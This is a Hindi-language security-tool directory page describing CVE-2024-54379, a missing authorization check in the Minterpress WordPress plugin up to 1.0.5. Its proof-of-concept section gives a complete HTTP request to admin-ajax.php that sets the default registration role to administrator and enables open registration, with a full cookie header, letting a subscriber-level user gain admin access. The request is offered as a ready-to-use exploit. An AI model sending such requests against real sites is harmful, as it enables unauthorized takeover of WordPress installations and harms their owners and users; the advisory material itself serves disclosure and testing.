Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-54379 — Minterpress <= 1.0.5 - प्रमाणीकरण की कमी से प्रमाणित (सब्सक्राइबर+) उपयोगकर्ता द्वारा मनमाना विकल्प अपडेट | Kitploit
उपकरण/GitHubGitHub/randomrobbiebf/cve-2024-54379
प्रमाणीकरण और प्राधिकरणविशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubrandomrobbiebf/cve-2024-54379

CVE-2024-54379

Minterpress <= 1.0.5 - प्रमाणीकरण की कमी से प्रमाणित (सब्सक्राइबर+) उपयोगकर्ता द्वारा मनमाना विकल्प अपडेट

रिपॉजिटरी देखें
21 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-54379

Minterpress <= 1.0.5 - प्रमाणित (सब्सक्राइबर+) उपयोगकर्ताओं के लिए लापता प्राधिकरण जाँच के कारण मनमाना विकल्प अद्यतन

विवरण

WordPress के लिए Minterpress प्लगइन, संस्करण 1.0.5 तक (1.0.5 सहित) सभी संस्करणों में एक फ़ंक्शन पर क्षमता जाँच (capability check) की कमी के कारण डेटा के अनधिकृत संशोधन के प्रति संवेदनशील है, जिससे विशेषाधिकार वृद्धि (privilege escalation) हो सकती है। इससे प्रमाणित हमलावरों को, जिनके पास सब्सक्राइबर-स्तर या उससे अधिक पहुंच है, WordPress साइट पर मनमाने विकल्प (arbitrary options) अद्यतन करना संभव हो जाता है। इसका उपयोग पंजीकरण के लिए डिफ़ॉल्ट भूमिका को व्यवस्थापक (administrator) में बदलने और उपयोगकर्ता पंजीकरण सक्षम करने के लिए किया जा सकता है, ताकि हमलावर किसी संवेदनशील साइट पर प्रशासनिक उपयोगकर्ता पहुंच प्राप्त कर सकें।

विवरण

  • प्रकार: प्लगइन
  • स्लग: minterpress
  • प्रभावित संस्करण: 1.0.5
  • CVSS स्कोर: 8.8
  • CVSS रेटिंग: उच्च
  • CVSS वेक्टर: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
  • CVE: CVE-2024-54379
  • स्थिति: बंद

POC

कुकीज़ को अपने लॉग इन किए गए उपयोगकर्ता कुकीज़ में बदलें।

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
Cookie: wordpress_sec_738b26438442006baf5dc1367e0c0fd7=superadmin%7C1734790221%7CenzNuyQN6cnP5g8Bmw6ZVil29WJCzcIc1bx3Z10l32r%7C31038bfa66d0777c50fba66263f613d288a20d1e14dfc0fc06903f77d1c9e41f; popup_time=2; alwaysStrip=1; _ga=GA1.2.1953252658.1732269795; _ga_16PD6PV48S=GS1.2.1732269795.1.0.1732270283.0.0.0; wp-settings-time-1=1734520301; wp-settings-1=libraryContent%3Dbrowse; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_738b26438442006baf5dc1367e0c0fd7=superadmin%7C1734790221%7CenzNuyQN6cnP5g8Bmw6ZVil29WJCzcIc1bx3Z10l32r%7C987ff9134b881efe3cced2fa12593fd0ba5b2b02613fb93f48433b112015551a; PHPSESSID=49f0a4bfb294cad31ed4a83ede9bf485; tk_ai=zv7IX5yQT%2F6RzXuKQwqmMvEV; th_shop_mania_thms_time=1735227350366; tk_qs=

action=update_options&options={"default_role":"administrator","users_can_register":"1"}
टूल डाउनलोड करें